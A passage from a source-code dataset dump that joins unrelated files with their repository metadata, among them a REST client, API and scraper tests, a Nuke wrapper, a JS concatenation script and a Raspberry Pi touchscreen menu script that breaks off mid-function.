# Content-Type which generated by urllib3 will be
# overwritten.
del headers['Content-Type']
r = self.pool_manager.request(
method, url,
fields=post_params,
encode_multipart=True,
preload_content=_preload_content,
timeout=timeout,
headers=headers)
# Pass a `string` parameter directly in the body to support
# other content types than Json when `body` argument is
# provided in serialized form
elif isinstance(body, str):
request_body = body
r = self.pool_manager.request(
method, url,
body=request_body,
preload_content=_preload_content,
timeout=timeout,
headers=headers)
else:
# Cannot generate the request from given parameters
msg = """Cannot prepare a request message for provided
arguments. Please check that your arguments match
declared content type."""
raise ApiException(status=0, reason=msg)
# For `GET`, `HEAD`
else:
r = self.pool_manager.request(method, url,
fields=query_params,
preload_content=_preload_content,
timeout=timeout,
headers=headers)
except urllib3.exceptions.SSLError as e:
msg = "{0}\n{1}".format(type(e).__name__, str(e))
raise ApiException(status=0, reason=msg)
if _preload_content:
r = RESTResponse(r)
# In the python 3, the response.data is bytes.
# we need to decode it to string.
if six.PY3:
r.data = r.data.decode('utf8')
# log response body
logger.debug("response body: %s", r.data)
if not 200 <= r.status <= 299:
raise ApiException(http_resp=r)
return r
def GET(self, url, headers=None, query_params=None, _preload_content=True,
_request_timeout=None):
return self.request("GET", url,
headers=headers,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
query_params=query_params)
def HEAD(self, url, headers=None, query_params=None, _preload_content=True,
_request_timeout=None):
return self.request("HEAD", url,
headers=headers,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
query_params=query_params)
def OPTIONS(self, url, headers=None, query_params=None, post_params=None,
body=None, _preload_content=True, _request_timeout=None):
return self.request("OPTIONS", url,
headers=headers,
query_params=query_params,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
def DELETE(self, url, headers=None, query_params=None, body=None,
_preload_content=True, _request_timeout=None):
return self.request("DELETE", url,
headers=headers,
query_params=query_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
def POST(self, url, headers=None, query_params=None, post_params=None,
body=None, _preload_content=True, _request_timeout=None):
return self.request("POST", url,
headers=headers,
query_params=query_params,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
def PUT(self, url, headers=None, query_params=None, post_params=None,
body=None, _preload_content=True, _request_timeout=None):
return self.request("PUT", url,
headers=headers,
query_params=query_params,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
def PATCH(self, url, headers=None, query_params=None, post_params=None,
body=None, _preload_content=True, _request_timeout=None):
return self.request("PATCH", url,
headers=headers,
query_params=query_params,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
class ApiException(Exception):
def __init__(self, status=None, reason=None, http_resp=None):
if http_resp:
self.status = http_resp.status
self.reason = http_resp.reason
self.body = http_resp.data
self.headers = http_resp.getheaders()
else:
self.status = status
self.reason = reason
self.body = None
self.headers = None
def __str__(self):
"""Custom error messages for exception"""
error_message = "({0})\n"\
"Reason: {1}\n".format(self.status, self.reason)
if self.headers:
error_message += "HTTP response headers: {0}\n".format(
self.headers)
if self.body:
error_message += "HTTP response body: {0}\n".format(self.body)
return error_message
| [
"[email protected]"
]
| |
12ec82e69e5b3d50651b488913b9e56d768c6259 | bd01527a0af06828c56206d1113c372787e0d1d0 | /backend/media/justrelax/node/media/player.py | 0fae154d42080e85207185137f7117e755f8f9ac | []
| no_license | nosseb/justrelax | 3810f3cbae507f3da3c7a0ab894e5c3236b8c9d1 | 812bdf7787a761c94afd867cfc4de20f993fc86a | refs/heads/master | 2022-11-26T22:12:33.825056 | 2020-07-21T15:42:27 | 2020-07-21T15:42:27 | 263,049,627 | 0 | 0 | null | 2020-05-11T13:24:52 | 2020-05-11T13:24:51 | null | UTF-8 | Python | false | false | 2,432 | py | from justrelax.common.logging_utils import logger
class MediaPlayerMixin:
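    # A small play/pause/stop state machine: play(), pause() and stop() pick the
    # transition that matches current_state, then delegate to the _play/_resume/
    # _pause/_stop hooks that subclasses are expected to override.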
STATE_NOT_STARTED = 'not_started'
STATE_PLAYING = 'playing'
STATE_PAUSED = 'paused'
def __init__(self):
self.current_state = MediaPlayerMixin.STATE_NOT_STARTED
def play(self):
if self.current_state == MediaPlayerMixin.STATE_NOT_STARTED:
logger.debug('Player has not been started yet')
self._play()
self.current_state = MediaPlayerMixin.STATE_PLAYING
elif self.current_state == MediaPlayerMixin.STATE_PLAYING:
logger.debug('Player is already playing')
logger.debug('Nothing to do')
elif self.current_state == MediaPlayerMixin.STATE_PAUSED:
logger.debug('Player is paused and had already been started')
self._resume()
self.current_state = MediaPlayerMixin.STATE_PLAYING
else:
pass
def pause(self):
if self.current_state == MediaPlayerMixin.STATE_NOT_STARTED:
logger.debug('Player has not been started yet')
logger.debug('Nothing to do')
elif self.current_state == MediaPlayerMixin.STATE_PLAYING:
logger.debug('Player is already playing')
self._pause()
self.current_state = MediaPlayerMixin.STATE_PAUSED
elif self.current_state == MediaPlayerMixin.STATE_PAUSED:
logger.debug('Player is paused and had already been started')
logger.debug('Nothing to do')
else:
pass
def stop(self):
if self.current_state == MediaPlayerMixin.STATE_NOT_STARTED:
logger.debug('Player has not been started yet')
logger.debug('Nothing to do')
elif self.current_state == MediaPlayerMixin.STATE_PLAYING:
logger.debug('Player is already playing')
self._stop()
self.current_state = MediaPlayerMixin.STATE_NOT_STARTED
elif self.current_state == MediaPlayerMixin.STATE_PAUSED:
logger.debug('Player is paused and had already been started')
self._stop()
self.current_state = MediaPlayerMixin.STATE_NOT_STARTED
else:
pass
def _play(self):
logger.debug("Playing")
def _resume(self):
logger.debug("Resuming")
def _pause(self):
logger.debug("Pausing")
def _stop(self):
logger.debug("Stopping")
| [
"[email protected]"
]
| |
485ebf8496bd146a42491a9f4317726e7d3725e0 | 79b93d7c36645735309a55973ec54d126956c612 | /Round1B/DraupnirBig.py | bbd9b31b2927243318da8e69786c1f06597f0bb4 | []
| no_license | rocket3989/codeJam2019 | a7523f27c73a8e69c35754ad1737f8587e626c9f | 2d383ef2eefac43a86b24433bb6371961002adc5 | refs/heads/master | 2022-02-28T23:52:56.653242 | 2019-09-25T01:01:43 | 2019-09-25T01:01:43 | 179,910,089 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 773 | py | T, M = list(map(int, input().split()))
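# Decoding sketch (what the bit arithmetic below assumes): ring i doubles every
# i days, so the day-200 reading isolates rings 4-6 at 2**50, 2**40 and 2**33,
# and the day-56 reading exposes rings 1-3 at 2**56, 2**28 and 2**18 once the
# known ring 4-6 contributions are subtracted off.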
for test in range(0,T):
r = [0,0,0,0,0,0,0]
inp = []
print(200)
inp.append(int(input()))
print(56)
inp.append(int(input()))
r[6] = (inp[0] % 2 ** 40) // 2 ** 33
inp[0] -= r[6] * 2 ** 33
r[5] = (inp[0] % 2 ** 50) // 2 ** 40
inp[0] -= r[5] * 2 ** 40
r[4] = inp[0] // 2 ** 50
inp[1] -= r[4] * 2 ** 14 + r[5] * 2 ** 11 + r[6] * 2 ** 9
r[3] = (inp[1] % 2 ** 28) // 2 ** 18
    inp[1] -= r[3] * 2 ** 18
r[2] = (inp[1] % 2 ** 56) // 2 ** 28
    inp[1] -= r[2] * 2 ** 28
r[1] = inp[1] // 2 ** 56
for out in r[1::]:
print(out, end=" ")
print()
res = int(input())
if res == -1:
exit() | [
"[email protected]"
]
| |
e22ed8db69cbcb31a38db3a504b7ff241cb1244b | 49c3166a46e84b193f8b70dfaf12757b8e385348 | /recipe_scrapers/tests/test_thepioneerwoman.py | 3b87fde7e5f2f7de001dc4e29870507d834b482b | [
"MIT"
]
| permissive | buneme/recipe-scrapers | f8f199ee47f52d74ef8813ff6bd1efb70d4064de | 7e3426a5e853335ba0999e2a50b1ea9b98ee429c | refs/heads/master | 2020-04-13T00:27:24.710040 | 2018-11-27T15:31:55 | 2018-11-27T15:31:55 | 162,845,950 | 1 | 0 | MIT | 2018-12-22T22:12:29 | 2018-12-22T22:12:29 | null | UTF-8 | Python | false | false | 2,468 | py | import os
import unittest
from recipe_scrapers.thepioneerwoman import ThePioneerWoman
class TestThePioneerWomanScraper(unittest.TestCase):
def setUp(self):
# tests are run from tests.py
with open(os.path.join(
os.getcwd(),
'recipe_scrapers',
'tests',
'test_data',
'thepioneerwoman.testhtml'
)) as file_opened:
self.harvester_class = ThePioneerWoman(file_opened, test=True)
def test_host(self):
self.assertEqual(
'thepioneerwoman.com',
self.harvester_class.host()
)
def test_title(self):
self.assertEqual(
self.harvester_class.title(),
'Patty Melts'
)
def test_total_time(self):
self.assertEqual(
35,
self.harvester_class.total_time()
)
def test_ingredients(self):
self.assertCountEqual(
[
'1 stick Butter',
'1 whole Large Onion, Halved And Sliced',
'1-1/2 pound Ground Beef',
'Salt And Pepper, to taste',
'5 dashes Worcestershire Sauce',
'8 slices Swiss Cheese',
'8 slices Rye Bread'
],
self.harvester_class.ingredients()
)
def test_instructions(self):
return self.assertEqual(
'In a medium skillet, melt 2 tablespoons of butter over medium-low heat.\n Throw in the sliced onions and cook slowly for 20 to 25 minutes, stirring occasionally, until the onions are golden brown and soft.\n In a medium bowl, mix together the ground beef, salt & pepper, and Worcestershire.\n Form into 4 patties.\nMelt 2 tablespoons butter in a separate skillet over medium heat.\n Cook the patties on both sides until totally done in the middle.\n Assemble patty melts this way: Slice of bread, slice of cheese, hamburger patty, 1/4 of the cooked onions, another slice of cheese, and another slice of bread.\n On a clean griddle or in a skillet, melt 2 tablespoons butter and grill the sandwiches over medium heat until golden brown.\n Remove the sandwiches and add the remaining 2 tablespoons of butter to the skillet.\n Turn the sandwiches to the skillet, flipping them to the other side.\n Cook until golden brown and crisp, and until cheese is melted.\n Slice in half and serve immediately!',
self.harvester_class.instructions()
)
| [
"[email protected]"
]
| |
b8ce6bca58314b866a7d721d90990ae2cc5492a5 | e3e8467a3bae0982bd1ae0a27474e59d61eabe95 | /nukepy | efe0df8dd0ca6a266d16c453902c4d02f54a5aa2 | []
| no_license | LumaPictures/nukecli | d47cd5c5a8d15cf5e584ac5b87362ad5333fa8d6 | 7ca3829cf940a3d836eb0104f41fb00321c9c92c | refs/heads/master | 2020-06-01T04:20:58.804388 | 2011-08-05T23:34:46 | 2011-08-05T23:34:46 | 2,163,112 | 15 | 4 | null | null | null | null | UTF-8 | Python | false | false | 1,441 | #!/usr/bin/env python
"""
Wrapper for Nuke -t that behaves more like a normal python binary.
- adds support for -c flag to pass a string of python code to execute
- expands symbolic links
- can be used as the interpreter in executable python scripts (e.g. #!/usr/bin/env nukepy)
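- example invocations (illustrative): `nukepy some_script.py arg1 arg2` or
  `nukepy -c "print('hello from Nuke')"`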
"""
from __future__ import with_statement
import sys
import os
import subprocess
import tempfile
newArgsList = []
nextIsPyCmd = False
tempFileName = None
try:
for arg in sys.argv[1:]:
if nextIsPyCmd:
nextIsPyCmd = False
fd, tempFileName = tempfile.mkstemp(suffix='.py',
prefix='nukepyCommand',
text=True)
with os.fdopen(fd, 'w') as tempFileHandle:
tempFileHandle.write(arg)
newArgsList.append(tempFileName)
elif arg == '-c':
if tempFileName is not None:
raise Exception('-c argument may only be given once')
nextIsPyCmd = True
elif os.path.islink(arg):
newArgsList.append(os.path.realpath(arg))
else:
newArgsList.append(arg)
procArgs = ["Nuke", "-c", "4G", "-t", "--"] + newArgsList
p = subprocess.Popen(procArgs)
os.waitpid(p.pid, 0)[1]
finally:
if tempFileName:
os.remove(tempFileName)
# this also works but exits in a slightly different way
#/bin/tcsh
#Nuke -t < $*
| [
"[email protected]"
]
| ||
9c32c81ada99ccdd475169383494827f0feba25d | fe06311a7de13a02ca0be37d84c542c3cece3f33 | /Chapter14/file_14_4k.py | c0a727e6cee4b1ac580ff06298411b2c8d3e643c | []
| no_license | mooksys/Python_Algorithms | a4a84ddabc34ec4b7cc0ac01d55019880af38514 | 375817e3dfdec94411cf245fe3f685a69d92b948 | refs/heads/master | 2020-08-24T06:35:05.791979 | 2018-07-30T01:22:24 | 2018-07-30T01:22:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 84 | py | import string
print(string.ascii_uppercase)  # Output: ABCDEFGHIJKLMNOPQRSTUVWXYZ
| [
"[email protected]"
]
| |
cbe54232f0be04c15cdde2e8131a03669382f580 | e6d79311f0e020f366f98fd0bb096e66598093e9 | /tests/test_aggregates.py | d9a34c164a72ef523f3854e45375ce6a452ff7f9 | [
"CC0-1.0",
"LicenseRef-scancode-public-domain"
]
| permissive | adborden/openFEC | b54fb4b0e854d9ad77de738420ea07f714574941 | 53a0a2b1a56292c5ca8e7a3185832baaed4a63d9 | refs/heads/develop | 2021-01-17T15:51:15.486471 | 2016-03-14T16:17:49 | 2016-03-14T16:17:49 | 53,984,188 | 0 | 1 | null | 2016-03-15T22:50:11 | 2016-03-15T22:50:11 | null | UTF-8 | Python | false | false | 10,824 | py | from tests import factories
from tests.common import ApiBaseTest, assert_dicts_subset
from webservices import schemas
from webservices.rest import db, api
from webservices.resources.aggregates import (
ScheduleAByEmployerView,
ScheduleEByCandidateView,
CommunicationCostByCandidateView,
ElectioneeringByCandidateView,
)
from webservices.resources.candidate_aggregates import (
ScheduleABySizeCandidateView,
ScheduleAByStateCandidateView,
TotalsCandidateView,
)
class TestCommitteeAggregates(ApiBaseTest):
def test_stable_sort(self):
rows = [
factories.ScheduleAByEmployerFactory(
committee_id='C001',
employer='omnicorp-{}'.format(idx),
total=538,
)
for idx in range(100)
]
employers = []
for page in range(2):
results = self._results(api.url_for(ScheduleAByEmployerView, sort='-total', per_page=50, page=page + 1))
employers.extend(result['employer'] for result in results)
assert len(set(employers)) == len(rows)
class TestAggregates(ApiBaseTest):
cases = [
(
factories.ScheduleEByCandidateFactory,
ScheduleEByCandidateView,
schemas.ScheduleEByCandidateSchema,
),
(
factories.CommunicationCostByCandidateFactory,
CommunicationCostByCandidateView,
schemas.CommunicationCostByCandidateSchema,
),
(
factories.ElectioneeringByCandidateFactory,
ElectioneeringByCandidateView,
schemas.ElectioneeringByCandidateSchema,
),
]
def setUp(self):
super(TestAggregates, self).setUp()
self.committee = factories.CommitteeHistoryFactory(
name='Ritchie for America',
cycle=2012,
)
self.candidate = factories.CandidateDetailFactory(
candidate_id='P123',
name='Robert Ritchie',
election_years=[2012],
office='P',
)
self.candidate_history = factories.CandidateHistoryFactory(
candidate_id='P123',
name='Robert Ritchie',
election_years=[2012],
two_year_period=2012,
office='P',
)
factories.CandidateElectionFactory(
candidate_id='P123',
cand_election_year=2012,
)
def make_aggregates(self, factory):
return [
factory(
candidate_id=self.candidate.candidate_id,
committee_id=self.committee.committee_id,
cycle=self.committee.cycle,
total=100,
count=5,
),
factory(
candidate_id=self.candidate.candidate_id,
committee_id=self.committee.committee_id,
cycle=self.committee.cycle - 2,
total=100,
count=5,
),
]
def test_candidate_aggregates_by_committee(self):
for factory, resource, schema in self.cases:
aggregates = self.make_aggregates(factory)
results = self._results(
api.url_for(
resource,
committee_id=self.committee.committee_id,
cycle=2012,
)
)
assert len(results) == 1
serialized = schema().dump(aggregates[0]).data
serialized.update({
'committee_name': self.committee.name,
'candidate_name': self.candidate.name,
})
assert results[0] == serialized
def test_candidate_aggregates_by_committee_full(self):
"""For each aggregate type, create a two-year aggregate in the target
election year and a two-year aggregate in the previous two-year period.
Assert that both aggregates are summed when the `election_full` flag is
passed.
"""
for factory, resource, schema in self.cases:
aggregates = self.make_aggregates(factory)
results = self._results(
api.url_for(
resource,
candidate_id=self.candidate.candidate_id,
committee_id=self.committee.committee_id,
cycle=2012,
election_full='true',
)
)
assert len(results) == 1
serialized = schema().dump(aggregates[0]).data
serialized.update({
'committee_name': self.committee.name,
'candidate_name': self.candidate.name,
'total': sum(each.total for each in aggregates),
'count': sum(each.count for each in aggregates),
})
assert results[0] == serialized
def test_candidate_aggregates_by_election(self):
for factory, resource, _ in self.cases:
[
factory(
committee_id=self.committee.committee_id,
candidate_id=self.candidate.candidate_id,
cycle=self.committee.cycle,
),
factory(
cycle=self.committee.cycle,
),
]
results = self._results(
api.url_for(
resource,
office='president',
cycle=2012,
)
)
assert len(results) == 1
assert results[0]['candidate_id'] == self.candidate.candidate_id
class TestCandidateAggregates(ApiBaseTest):
def setUp(self):
super().setUp()
self.candidate = factories.CandidateHistoryFactory(
candidate_id='S123',
two_year_period=2012,
)
self.committees = [
factories.CommitteeHistoryFactory(cycle=2012, designation='P'),
factories.CommitteeHistoryFactory(cycle=2012, designation='A'),
]
factories.CandidateHistoryLatestFactory(
candidate_id=self.candidate.candidate_id,
cand_election_year=2012,
two_year_period=2012,
)
factories.CandidateDetailFactory(
candidate_id=self.candidate.candidate_id,
election_years=[2008, 2012],
)
[
factories.CandidateElectionFactory(
candidate_id=self.candidate.candidate_id,
cand_election_year=election_year
)
for election_year in [2008, 2012]
]
[
factories.CommitteeDetailFactory(committee_id=each.committee_id)
for each in self.committees
]
factories.CandidateTotalFactory(
candidate_id=self.candidate.candidate_id,
cycle=2012,
is_election=True,
receipts=100,
)
factories.CandidateTotalFactory(
candidate_id=self.candidate.candidate_id,
cycle=2012,
is_election=False,
receipts=75,
)
db.session.flush()
# Create two-year totals for both the target period (2011-2012) and the
# previous period (2009-2010) for testing the `election_full` flag
factories.CandidateCommitteeLinkFactory(
candidate_id=self.candidate.candidate_id,
committee_id=self.committees[0].committee_id,
committee_designation='P',
committee_type='S',
fec_election_year=2012,
)
factories.CandidateCommitteeLinkFactory(
candidate_id=self.candidate.candidate_id,
committee_id=self.committees[1].committee_id,
committee_designation='A',
committee_type='S',
fec_election_year=2012,
)
factories.CandidateCommitteeLinkFactory(
candidate_id=self.candidate.candidate_id,
committee_id=self.committees[1].committee_id,
committee_designation='A',
committee_type='S',
fec_election_year=2010,
)
def test_by_size(self):
[
factories.ScheduleABySizeFactory(
committee_id=self.committees[0].committee_id,
cycle=2012,
total=50,
size=200,
),
factories.ScheduleABySizeFactory(
committee_id=self.committees[1].committee_id,
cycle=2012,
total=150,
size=200,
),
]
results = self._results(
api.url_for(
ScheduleABySizeCandidateView,
candidate_id=self.candidate.candidate_id,
cycle=2012,
)
)
self.assertEqual(len(results), 1)
expected = {
'candidate_id': self.candidate.candidate_id,
'cycle': 2012,
'total': 200,
'size': 200,
}
self.assertEqual(results[0], expected)
def test_by_state(self):
[
factories.ScheduleAByStateFactory(
committee_id=self.committees[0].committee_id,
cycle=2012,
total=50,
state='NY',
state_full='New York',
),
factories.ScheduleAByStateFactory(
committee_id=self.committees[1].committee_id,
cycle=2012,
total=150,
state='NY',
state_full='New York',
),
]
results = self._results(
api.url_for(
ScheduleAByStateCandidateView,
candidate_id=self.candidate.candidate_id,
cycle=2012,
)
)
self.assertEqual(len(results), 1)
expected = {
'candidate_id': self.candidate.candidate_id,
'cycle': 2012,
'total': 200,
'state': 'NY',
'state_full': 'New York',
}
self.assertEqual(results[0], expected)
def test_totals(self):
results = self._results(
api.url_for(
TotalsCandidateView,
candidate_id=self.candidate.candidate_id,
cycle=2012,
)
)
assert len(results) == 1
assert_dicts_subset(results[0], {'cycle': 2012, 'receipts': 75})
def test_totals_full(self):
results = self._results(
api.url_for(
TotalsCandidateView,
candidate_id=self.candidate.candidate_id,
cycle=2012,
election_full='true',
)
)
assert len(results) == 1
assert_dicts_subset(results[0], {'cycle': 2012, 'receipts': 100})
| [
"[email protected]"
]
| |
b46e91baeb582c1b23025c803fe705dab8582a91 | d2bbf50859beb3447d8e15d5d11f89942f1b21d3 | /Top down design lab/conversion1.py | 56c6680b68b9082c71627b440e82dace9a22c5a0 | []
| no_license | nbenkler/CS110_Intro_CS | f5bc8da21bac9bc4d1c01070b5f7cc75fb3ab012 | 372483bce661ef8052c2ebbe832cc6ec1922d113 | refs/heads/master | 2020-04-24T07:25:26.630687 | 2019-02-21T04:27:55 | 2019-02-21T04:27:55 | 171,798,847 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 382 | py | #conversion1.py
# A program to convert Celsius temps to Fahrenheit
def main():
    fileName = input("What is the name of the file you would like to convert? ")
inFile = open(fileName, "r")
for line in inFile:
celsius = int(line)
fahrenheit = 9/5 * celsius + 32
print(celsius, "degrees celsius is", fahrenheit, "degrees in Fahrenheit.")
inFile.close()
main()
| [
"[email protected]"
]
| |
8d626cd10ddba11c2cc47aaaae26cca82f16f13d | bb6ebff7a7f6140903d37905c350954ff6599091 | /third_party/WebKit/Source/devtools/scripts/concatenate_js_files.py | 69d776abae74eff185f6689bcb1c595dffa5d111 | [
"LGPL-2.0-or-later",
"GPL-1.0-or-later",
"MIT",
"Apache-2.0",
"BSD-3-Clause"
]
| permissive | PDi-Communication-Systems-Inc/lollipop_external_chromium_org | faa6602bd6bfd9b9b6277ce3cd16df0bd26e7f2f | ccadf4e63dd34be157281f53fe213d09a8c66d2c | refs/heads/master | 2022-12-23T18:07:04.568931 | 2016-04-11T16:03:36 | 2016-04-11T16:03:36 | 53,677,925 | 0 | 1 | BSD-3-Clause | 2022-12-09T23:46:46 | 2016-03-11T15:49:07 | C++ | UTF-8 | Python | false | false | 4,254 | py | #!/usr/bin/env python
#
# Copyright (C) 2010 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# This script concatenates in place JS files in the order specified
# using <script> tags in a given 'order.html' file.
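#
# Example invocation (illustrative, matching the usage string below):
#   concatenate_js_files.py order.html front_end_dir_1 front_end_dir_2 output.js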
from __future__ import with_statement
from HTMLParser import HTMLParser
from cStringIO import StringIO
import os.path
import sys
rjsmin_path = os.path.abspath(os.path.join(
os.path.dirname(__file__),
"..",
"..",
"build",
"scripts"))
sys.path.append(rjsmin_path)
import rjsmin
class OrderedJSFilesExtractor(HTMLParser):
def __init__(self, order_html):
HTMLParser.__init__(self)
self.ordered_js_files = []
self.feed(order_html)
def handle_starttag(self, tag, attrs):
if tag == 'script':
attrs_dict = dict(attrs)
if ('type' in attrs_dict and attrs_dict['type'] == 'text/javascript' and 'src' in attrs_dict):
self.ordered_js_files.append(attrs_dict['src'])
class PathExpander:
def __init__(self, paths):
self.paths = paths
def expand(self, filename):
for path in self.paths:
fname = os.path.join(path, filename)
if (os.access(fname, os.F_OK)):
return fname
return None
def main(argv):
if len(argv) < 3:
print('usage: %s order.html input_source_dir_1 input_source_dir_2 ... '
'output_file' % argv[0])
return 1
output_file_name = argv.pop()
input_order_file_name = argv[1]
with open(input_order_file_name, 'r') as order_html:
extractor = OrderedJSFilesExtractor(order_html.read())
expander = PathExpander(argv[2:])
output = StringIO()
for input_file_name in extractor.ordered_js_files:
full_path = expander.expand(input_file_name)
if (full_path is None):
raise Exception('File %s referenced in %s not found on any source paths, '
'check source tree for consistency' %
(input_file_name, input_order_file_name))
output.write('/* %s */\n\n' % input_file_name)
input_file = open(full_path, 'r')
output.write(input_file.read())
output.write('\n')
input_file.close()
if os.path.exists(output_file_name):
os.remove(output_file_name)
output_file = open(output_file_name, 'w')
output_file.write(rjsmin.jsmin(output.getvalue()))
output_file.close()
output.close()
# Touch output file directory to make sure that Xcode will copy
# modified resource files.
if sys.platform == 'darwin':
output_dir_name = os.path.dirname(output_file_name)
os.utime(output_dir_name, None)
if __name__ == '__main__':
sys.exit(main(sys.argv))
| [
"[email protected]"
]
| |
83626a499b71960a0cbd94990cb81f96a5cc2601 | ff69aab96d76ac3dc5b93605617314c6eb2b257c | /gymmeforce/models/__init__.py | 4cedb96b2487ce53f7fda441d4b1d2cc233798a2 | [
"MIT"
]
| permissive | init27Lab/gymmeforce | a9fc7e455b8427ce2c3334e059ee6e532adb3384 | 12731bcf34de9e9a94fae085cdfe10e3f4e0d142 | refs/heads/master | 2021-09-01T12:30:16.508592 | 2017-12-27T01:35:21 | 2017-12-27T01:35:21 | 115,546,238 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 211 | py | from gymmeforce.models.base_model import BaseModel
from gymmeforce.models.dqn_model import DQNModel
from gymmeforce.models.vanilla_pg_model import VanillaPGModel
from gymmeforce.models.ppo_model import PPOModel
| [
"[email protected]"
]
| |
c439df6bafaa4167d39bfcd0250e95a1dca7f532 | 79197ddad40d2780a8f291bffa2cb58509c055bb | /Menus/menu-1.py | d09c2355e97f9093a2030524511a2994180fe946 | []
| no_license | Adrien-FILIPPI/Hackbox | 6dd0c66e0fa72a249ee06c6064cbc9bb66eeaa7b | c58495503abc2948ae1d6e2ea1705ee48192f1df | refs/heads/master | 2021-01-25T09:37:59.960101 | 2019-01-08T16:04:38 | 2019-01-08T16:04:38 | 93,864,005 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,712 | py | #!/usr/bin/env python
import kalipi
from kalipi import *
#############################
## Local Functions ##
# Check VNC status
def check_vnc():
if 'vnc :1' in commands.getoutput('/bin/ps -ef'):
return True
else:
return False
# Check Terminal session status
def check_terminal():
if 'SCREEN -R -S term' in commands.getoutput('/bin/ps -ef'):
return True
else:
return False
## Local Functions ##
#############################
#############################
## Buttons ##
# define all of the buttons
titleButton = Button(" " + kalipi.get_hostname() + " " + kalipi.get_ip(), originX, originX, buttonHeight, buttonWidth * 3 + spacing * 2, tron_blu, tron_ora, titleFont)
button1 = Button(labelPadding * " " + " Exit", originX, originY, buttonHeight, buttonWidth, tron_blu, tron_whi, labelFont)
button2 = Button(labelPadding * " " + " X on TFT", originX + buttonWidth + spacing, originY, buttonHeight, buttonWidth, tron_blu, tron_whi, labelFont)
button3 = Button(labelPadding * " " + " X on HDMI", originX + (buttonWidth * 2) + (spacing * 2), originY, buttonHeight, buttonWidth, tron_blu, tron_whi, labelFont)
button4 = Button(labelPadding * " " + " Shutdown", originX, originY + buttonHeight + spacing, buttonHeight, buttonWidth, tron_blu, tron_whi, labelFont)
button5 = Button(labelPadding * " " + " Find IP", originX + buttonWidth + spacing, originY + buttonHeight + spacing, buttonHeight, buttonWidth, tron_blu, tron_whi, labelFont)
button6 = Button(labelPadding * " " + " Terminal", originX + (buttonWidth * 2) + (spacing * 2), originY + buttonHeight + spacing, buttonHeight, buttonWidth, tron_blu,tron_whi, labelFont)
button7 = Button(labelPadding * " " + " Reboot", originX, originY + (buttonHeight * 2) + (spacing * 2), buttonHeight, buttonWidth, tron_blu, tron_whi, labelFont)
button8 = Button(labelPadding * " " + " Screen Off", originX + buttonWidth + spacing, originY + (buttonHeight * 2) + (spacing * 2), buttonHeight, buttonWidth, tron_blu, tron_whi, labelFont)
button9 = Button(labelPadding * " " + " >>>", originX + (buttonWidth * 2) + (spacing * 2), originY + (buttonHeight * 2) + (spacing * 2), buttonHeight, buttonWidth, tron_blu, tron_whi, labelFont)
# Define each button press action
def button(number):
if number == 1:
if button1.disable == 1:
return
# Exit
process = subprocess.call("setterm -term linux -back default -fore white -clear all", shell=True)
pygame.quit()
sys.exit(37)
if number == 2:
if button2.disable == 1:
return
# X TFT
pygame.quit()
## Requires "Anybody" in dpkg-reconfigure x11-common if we have scrolled pages previously
## kalipi.run_cmd("/usr/bin/sudo -u pi FRAMEBUFFER=/dev/fb1 startx")
kalipi.run_cmd("/usr/bin/sudo FRAMEBUFFER=/dev/fb1 startx")
os.execv(__file__, sys.argv)
if number == 3:
if button3.disable == 1:
return
# X HDMI
pygame.quit()
## Requires "Anybody" in dpkg-reconfigure x11-common if we have scrolled pages previously
## kalipi.run_cmd("/usr/bin/sudo -u pi FRAMEBUFFER=/dev/fb0 startx")
kalipi.run_cmd("/usr/bin/sudo FRAMEBUFFER=/dev/fb0 startx")
os.execv(__file__, sys.argv)
if number == 4:
if button4.disable == 1:
return
# Shutdown
pygame.quit()
kalipi.run_cmd("/usr/bin/sudo /sbin/shutdown -h now")
sys.exit()
if number == 5:
if button5.disable == 1:
return
# Find IP
pygame.quit()
kalipi.run_cmd("/opt/hackbox/findip.sh")
os.execv(__file__, sys.argv)
if number == 6:
if button6.disable == 1:
return
# Terminal
process = subprocess.call("setterm -term linux -back default -fore white -clear all", shell=True)
pygame.quit()
kalipi.run_cmd("/usr/bin/sudo -u pi screen -R -S term")
process = subprocess.call("setterm -term linux -back default -fore black -clear all", shell=True)
os.execv(__file__, sys.argv)
if check_terminal():
button6.fntColor = green
button6.draw()
pygame.display.update()
else:
button6.fntColor = tron_whi
button6.draw()
pygame.display.update()
return
if number == 7:
if button7.disable == 1:
return
# Reboot
pygame.quit()
kalipi.run_cmd("/usr/bin/sudo /sbin/shutdown -r now")
sys.exit()
if number == 8:
